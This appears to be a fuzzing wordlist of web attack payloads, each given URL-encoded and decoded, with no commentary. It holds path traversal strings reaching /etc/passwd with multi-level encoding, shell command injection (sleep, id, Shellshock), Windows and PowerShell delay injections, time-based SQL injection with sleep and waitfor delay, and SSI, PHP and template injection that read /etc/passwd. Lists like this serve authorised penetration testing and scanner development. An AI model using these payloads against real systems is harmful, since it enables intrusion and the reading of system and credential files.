.%5E%2C%2F%3C%3E'%22
.^,/<>'"
%3B'
;'
%23
#
%5C
\
%24%7B
${
*
%2F*
/*
%2F%2F
//
%3F
?
%40
@
toString
__proto__
length
prototype
--help
--version
%24PATH
$PATH
'%24PATH
'$PATH
%22%24PATH
"$PATH
%7Cid%20%23
|id #
%60id%60
`id`
..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
../../../../../../../etc/passwd
..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252fetc%25252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd%2500
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%3Bsleep%204%3B
;sleep 4;
%7Csleep%204%23
|sleep 4#
%7C%2Fusr%2Fbin%2Fsleep%204%23
|/usr/bin/sleep 4#
%7Csleep%204%3B
|sleep 4;
%26%20sleep%204%3B
& sleep 4;
%3Bsleep%204%7C
;sleep 4|
%60sleep%204%60
`sleep 4`
%60%2Fusr%2Fbin%2Fsleep%204%60
`/usr/bin/sleep 4`
()%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fbash%20-c%20%22sleep%204%22
() { :;}; /bin/bash -c "sleep 4"
%7CC%3A%5CWindows%5CSystem32%5Ctimeout.exe%204
|C:\Windows\System32\timeout.exe 4
%7Ctimeout%204%7C
|timeout 4|
%7CC%3A%5CWindows%5CSystem32%5Ctimeout.exe%204%7C
|C:\Windows\System32\timeout.exe 4|
%7Ctimeout%204%3B
|timeout 4;
%3Bsystem('timeout%204')
;system('timeout 4')
%3Bsystem('C%3A%5CWindows%5CSystem32%5Ctimeout.exe%204')
;system('C:\Windows\System32\timeout.exe 4')
%26%26%20FOR%20%2FF%20%22delims%3D%22%20%25i%20IN%20('timeout%204')%20DO%20echo%201
&& FOR /F "delims=" %i IN ('timeout 4') DO echo 1
%3BStart-Sleep%20-s%204%3B
;Start-Sleep -s 4;
%3BStart-Sleep%20-s%204%23
;Start-Sleep -s 4#
%7CStart-Sleep%20-s%204%7C
|Start-Sleep -s 4|
%7CStart-Sleep%20-s%204%3B
|Start-Sleep -s 4;
%3BStart-Sleep%20-s%204%7C
;Start-Sleep -s 4|
%3Bsystem('Start-Sleep%20-s%204')
;system('Start-Sleep -s 4')
%250AStart-Sleep%20-s%204%250A
%0AStart-Sleep -s 4%0A
%250a%20Start-Sleep%20-s%204%20%250a
%0a Start-Sleep -s 4 %0a
sleep(4)%23
sleep(4)#
1%20or%20sleep(4)%23
1 or sleep(4)#
%22%20or%20sleep(4)%23
" or sleep(4)#
'%20or%20sleep(4)%23
' or sleep(4)#
%22%20or%20sleep(4)%3D%22
" or sleep(4)="
'%20or%20sleep(4)%3D'
' or sleep(4)='
1)%20or%20sleep(4)%23
1) or sleep(4)#
%22)%20or%20sleep(4)%3D%22
") or sleep(4)="
')%20or%20sleep(4)%3D'
') or sleep(4)='
1))%20or%20sleep(4)%23
1)) or sleep(4)#
%22))%20or%20sleep(4)%3D%22
")) or sleep(4)="
'))%20or%20sleep(4)%3D'
')) or sleep(4)='
%3Bwaitfor%20delay%20'0%3A0%3A4'--
;waitfor delay '0:0:4'--
)%3Bwaitfor%20delay%20'0%3A0%3A4'--
);waitfor delay '0:0:4'--
'%3Bwaitfor%20delay%20'0%3A0%3A4'--
';waitfor delay '0:0:4'--
%22%3Bwaitfor%20delay%20'0%3A0%3A4'--
";waitfor delay '0:0:4'--
')%3Bwaitfor%20delay%20'0%3A0%3A4'--
');waitfor delay '0:0:4'--
%22)%3Bwaitfor%20delay%20'0%3A0%3A4'--
");waitfor delay '0:0:4'--
))%3Bwaitfor%20delay%20'0%3A0%3A4'--
));waitfor delay '0:0:4'--
'))%3Bwaitfor%20delay%20'0%3A0%3A4'--
'));waitfor delay '0:0:4'--
%22))%3Bwaitfor%20delay%20'0%3A0%3A4'--
"));waitfor delay '0:0:4'--
%24(%60cat%20%2Fetc%2Fpasswd%60)
$(`cat /etc/passwd`)
%7Ccat%20%2Fetc%2Fpasswd
|cat /etc/passwd
%3Bcat%20%2Fetc%2Fpasswd%23
;cat /etc/passwd#
%3Bcat%20%2Fetc%2Fpasswd
;cat /etc/passwd
%250Acat%2520%2Fetc%2Fpasswd
%0Acat%20/etc/passwd
%7B%7B%20get_user_file(%22%2Fetc%2Fpasswd%22)%20%7D%7D
{{ get_user_file("/etc/passwd") }}
%3C!--%23exec%20cmd%3D%22%2Fbin%2Fcat%20%2Fetc%2Fpasswd%22--%3E
<!--#exec cmd="/bin/cat /etc/passwd"-->
system('cat%20%2Fetc%2Fpasswd')%3B
system('cat /etc/passwd');
%3C%3Fphp%20system(%22cat%20%2Fetc%2Fpasswd%22)%3B%3F%3E
<?php system("cat /etc/passwd");?>
%3Bsystem('cat%2520%2Fetc%2Fpasswd')
;system('cat%20/etc/passwd')
%26lt%3B!--%23exec%2520cmd%3D%26quot%3B%2Fbin%2Fcat%2520%2Fetc%2Fpasswd%26quot%3B--%26gt%3B
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
